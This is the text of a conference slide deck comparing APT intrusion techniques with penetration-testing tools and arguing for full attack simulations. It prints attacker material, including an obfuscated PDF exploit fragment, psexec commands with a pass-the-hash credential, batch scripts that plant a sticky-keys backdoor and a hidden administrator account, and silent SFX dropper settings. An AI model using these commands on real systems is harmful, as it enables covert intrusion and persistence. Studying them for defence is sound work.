Evolution of PenTesting

Evolution of PenTesting 1

Introduction Name: Russ Gideon Title: Director of Malware Research Contact: rgideon@attackresearch.com Twitter: @gideonsecurity Background: Led numerous Red Teams Foreign attack profiling and reverse engineering Recent work in integration of malware and attack profiling attributes in Attack Research penetration testing 2

What is this talk? Evolution A dissection of real world attacks and some of its affects on penetration testing. Reflection on real offensive operators vs penetration testers Conclusions are derived from mainly a forensics/binary analysis perspective What this talk is not! A slam on current penetration testing tools! 3

Evolution 1960s discussions about Time Sharing computers being vulnerable RAND Corporation NSA Coined the term penetration for this Evolved into Tiger Teams From a historical perspective influential people in this Willis Ware 4

The Birth Of an Industry Industry realized we need to behave like attackers to learn how to defend against them Henceforth the industry we all know and love is born 5

Evolution Of an Industry Industry gets bigger Tools become a commodity Attackers evolved and changed tactics Employed varying degrees of malware Deception Leverage protocol and design flaws Evasion and anti-analysis techniques The industry tools also evolved, but not in the same manner 6

Memory corruption == $$$ Tools become commodity The shift begins Attackers are closed source and don t release 7

We Make Strange Bedfellows 8

Offensive Operators 9

Why do we call it APT? APT!= Advanced Clever!= Advanced Attackers work as hard as they have to but not any harder As we step up the defense game they have to work harder Currently that game is not too difficult (in most places) 10

Getting In Outline APT Lateral Movement vspentesterslateral Movement Staging The Attack 11

Getting In Spear Phishing 12

Example CVE 2010-2883 Getting In Stack-based buffer overflow in CoolType.dll Very popular for targeted spear phishing 22 unique samples with this exploit in them Case study 7 of these samples are made with metasploit smodule for this Targeted Attack With a PDF D4169301AFBC86A04135EBC4A6A4BAD.pdf 13

Getting In Metasploit has a great module for 2010-2883 If a host isn t vulnerable then it will drop and open a clean Hello World PDF 14

Getting In D4169301AFBC86A04135EBC4A6A4BADB.pdf Includes this data stream Look familiar? 15

Getting In The shellcodeis the only significant difference between the APT sample and a general metasploit created PDF 16

Getting In WjozzFaiSj = unescape varnxzarhpbywaqabgpgx0t0zgkvqwhu = \x25\x754141\x25\x754141%63a5%u4a80\0x25 snip.. 0x75fa65%uec10%u0937%ufb0c%ufd97.snip %ud045%uc689%uc789%uc981\x25\x75ffff\x25\x75ffff%uc031%uae f2" 17

Using MSF DEP/ASLR Bypass MSF Created PDF seg000:00000136 db 84h seg000:00000137 db 4Ah ; seg000:00000138 db 92h ; seg000:00000139 db 0B6h seg000:0000013a db 80h ; seg000:0000013b db 4Ah seg000:0000013c db 0FFh seg000:0000013d db 0FFh seg000:0000013e db 0FFh seg000:0000013f db 0FFh seg000:00000140 db 0FFh seg000:00000141 db 0FFh seg000:00000142 db 0FFh seg000:00000143 db 0FFh seg000:00000144 db 0FFh seg000:00000145 db 0FFh seg000:00000146 db 0FFh seg000:00000147 db 0FFh seg000:00000148 db 0 seg000:00000149 db 10h seg000:0000014a db 0 seg000:0000014b db 0 APT Created PDF with MSF seg000:00000136 db 84h seg000:00000137 db 4Ah ; seg000:00000138 db 92h ; seg000:00000139 db 0B6h seg000:0000013a db 80h ; seg000:0000013b db 4Ah seg000:0000013c db 0FFh seg000:0000013d db 0FFh seg000:0000013e db 0FFh seg000:0000013f db 0FFh seg000:00000140 db 0FFh seg000:00000141 db 0FFh seg000:00000142 db 0FFh seg000:00000143 db 0FFh seg000:00000144 db 0FFh seg000:00000145 db 0FFh seg000:00000146 db 0FFh seg000:00000147 db 0FFh seg000:00000148 db 0 seg000:00000149 db 10h seg000:0000014a db 0 seg000:0000014b db 0 18

Side Note The original sample from contagio Dropper is igfxver.exe AV family of Chifrax D4169301AFBC86A04135EBC4A6A4BAD B.pdf Dropper is AcroRd32.exe in temp %TEMP%\AcroRd32.exe drops and starts rundll32.exe "C:\WINDOWS\system32\wuausrv.dll",TStartUp 0x11 AV Family of Protux Delivered ~2 weeks later 19

Getting In Conclusion Pen Tester: SingTableCoolTypeDLL Overflow MSF Module with PDF dropper. Not a white hat based disclosure Originally found in a targeted campaign http://contagiodump.blogspot.com/search/label/cve-2010-2883 Attacker: Rip off MSF Module This attack used the metasploit module Change out shellcode Added obfuscation Verdict: Attacker rips off another attackers tactic and makes it better 20

Getting In Outline APT Lateral Movement vspen Testers Lateral Movement Staging The Attack 21

Lateral Movement 22

APT Lateral Movement Case Study: a1765a7f3376c76d8c23766a92f1cb6b.exe Nps.exe Sample from IR we conducted In a nutshell their own PSEXEC for shoveling shells 23

Lateral Movement General flow of the sample From controlling node Execute: nps.exe install $Victim NPServer Drops nps.exe on \\victim\admin$\system32 Creates a service around nps.exe (named NPServer) on remote server and starts it Named pipes created on victim host and used for communications NPStdin NPStdout 24

Lateral Movment Based upon arguments it is a service binary or drops the communication piece on the remote host 25

Lateral Movement Dropper to the victim 26

Lateral Movement Remote Named pipes for all communications Controlling host Victim Host 27

Lateral Movement Taking advantage of credential authorization Of course won t work in all situations Account needs to have administrative privileges Vista and up Credentials have to be domain based Local administrative credentials can t write to C$ and Admin$ 28

Forensic Evidence 29

Forensic Evidence 30

Pen Testers Forensic Evidence Metasploithas the same capability with PSEXEC General flow Pushes service executable with payload to \\victim\admin$\system32 Uses DCERPC to create a service around the service binary on victim host Starts the service on the victim Uses payload defined variables for communication 31

Pen Testers Forensic Evidence 32

Pen Testers Forensic Evidence 33

Usage 34

Usage msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST address yes The target RPORT service port 445 yes Set the SMB SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain WORKGROUP domain to use for authentication no The Windows SMBPass for the specified username no The password SMBUser no to authenticate as The username 35

Major Differences! NPS.exe usage screen. Shows flexibility to alter your forensic evidence Metasploit doesn t have this capability Derives its service name and display name from 2 pieces of code in the module Service name generation looks like servicename = rand_text_alpha(8) Display name generation looks like: displayname = 'M' + rand_text_alpha(rand(32)+1) 36

Not Blending in! Major Differences rand_text_alpha(8) 'M' + rand_text_alpha(rand(32)+1) 37

Lateral Movement Solution A few lines added to the psexecmodule and we have some flexibility now Register two new options SVCName The Service name you want to use. This will be what is left over in the registry under HKLM\CurrentControlSet\services if the service is not cleaned up DisplayName This is the display name of the service that will show up in the event logs 38

Lateral Movement Solution psexec_ar options msf exploit(psexec_ar) > set DisplayName NPServer msf exploit(psexec_ar) > set RHOST victim msf exploit(psexec_ar) > set SMBDomain"" msf exploit(psexec_ar) > set SMBUser Administrator msf exploit(psexec_ar) > set SMBPass E52CAC67449B9A233A3B108F3FA6CB6D:8846F72AE28FB127AD06BED830B7586 msf exploit(psexec_ar) > set SVCName NPServer msf exploit(psexec_ar) > set SERVICE_FILENAME NPServer.exe msf exploit(psexec_ar) > set EXE::Custom mycustom.exe msf exploit(psexec_ar) > exploit 39

Lateral Movement Solution 40

Lateral Movement Solution Available on GitHub https://github.com/attackresearch/metasploit/blob/master/modules/exploits/psexec_ar.rb 41

Lateral Movement Conclusion Pen Tester: MSF Psexec module Randomized service names Obvious badness Very loud Attacker: Custom psexec type functionality Blend in and look normal Uses named pipes for communication Very basic backdoor that still isn't caught by AV Verdict: Superior attacker technique, less likely to get caught 42

Getting In Outline APT Lateral Movement vspen Testers Lateral Movement Staging The Attack 43

Staging The Attack 44

Staging The Attack Automation is the key Humans make mistakes Automate the post exploitation Sounds advanced doesn t it? 45

Why Raise The Bar? Found on various C2 hosts and on the victims MM.exe Simple automation of their attack Helps them for speed Helps us with being able know how they will operate in environments next time Rar files aren t just for exfiltration 46

Why Raise The Bar? Dissection of mm.exe Self executing rar file Drops 2.bat and mm.exe in C:\Temp C:\Temp\mm.exe isn t the same as the original mm.exe New mm.exe Another UPX packed SFX Drops 22.bat and net1.exe in C:\Temp 47

Why Raise The Bar? 2.bat copy %windir%\explorer.exe %windir%\system32\explorer1.exe copy %windir%\system32\sethc.exe %windir%\system32\asethc.exe copy c:\temp\mm.exe %windir%\system32\dllcache\magnify.exe copy c:\temp\mm.exe %windir%\system32\magnify1.exe del %windir%\system32\sethc.exe del %windir%\system32\magnify.exe c: cd%windir%\system32\ renexplorer1.exe sethc.exe ren magnify1.exe magnify.exe 48

22.bat Why Raise The Bar? c:\temp\net1.exe user syslem$ /active:y c:\temp\net1.exe user SYSLEM$ qazwsx!@#123 c:\temp\net1.exe user SYSLEM$ qazwsx!@#123 /add c:\temp\net1.exe localgroup Administrators syslem$ /add Now they have Persistence Communications 49

Before and After 50

Why Raise The Bar? Build the SFX RAR file Rar.exe a -sfxdefault.sfx-zsettings.conf mm2.exe mm.exe 2.bat Settings.conf ;The comment below contains SFX script commands Path=C:\Temp\ SavePath Overwrite=1 Silent=1 Setup=2.bat 51

Why Raise The Bar? Build the SFX RAR file Rar.exe a -sfxdefault.sfx zsettings1.conf mm.exe C:\Windows\System32\net1.exe 22.bat Settings1.conf ;The comment below contains SFX script commands Path=C:\Temp\ SavePath Overwrite=1 Silent=1 Setup=22.bat 52

Staging The Attack Conclusion Pen Tester: Possible MSF Module There really isn t a tool comparison Make a metasploitmodule for this? Working harder than have to? Attacker: Attack Process is Automated No need for a complex framework Works into attackers tool set Leverage system resources and that is it Verdict: Attacker technique is simple and effective. Doesn t work harder than has to 53

Conclusions Every attack (and group/person) has its characteristics as do pen testers The objectives of a pen tester are usually much different than an nation state operator or black hat Pen tests have a tone of constraints Pen testers are there to test for vulnerabilities Which is needed This is not testing the system as a whole How does your system react to a true compromise 54

Conclusions Testing the system as whole Targeted attacks affect the whole system Penetration testing really just looks for vulnerabilities We have corrupted the term penetration tests Pen Test = 20K cheap scan and assessment Attack Modeling and Simulations aren t the same as a our current definition of penetration tests 55

Attack Simulations and Modeling Testing the system as whole: Monitoring Triage process Incident Response process Your operations and your vendors Business con-ops Disaster recovery If you pull the plug on your network you are in disaster recovery! 56

Attack Simulations: Case Study 57

Attack Simulations What s the difference between a fire inspector and a fireman? Fire inspectors are hired to => Inspect Exit lights are working Fire alarms are working Fire extinguishers are up to par Fireman are hired to => Respond Fires Medical emergencies Large scale disasters 58

Attack Simulations Do not have your incident response capability behave as fire inspectors They are needed to respond not inspect We must start training the IR capability More than just penetration testing of them What are firemen doing while they are down? Training Is your IR team technically capable of handling an incident Revere Engineering PCAP Analysis Log mining Does the business know how to use them 59

Attack Simulations You might not be ready for a full stress test of your environment Engage someone that has done this work and see what they can do. More than likely there is a lot they can do with and for you Testing your NOC/IR Ops Testing your detection tools/capabilities Modeling attacker workflows and how it relates to your data 60

Questions? 61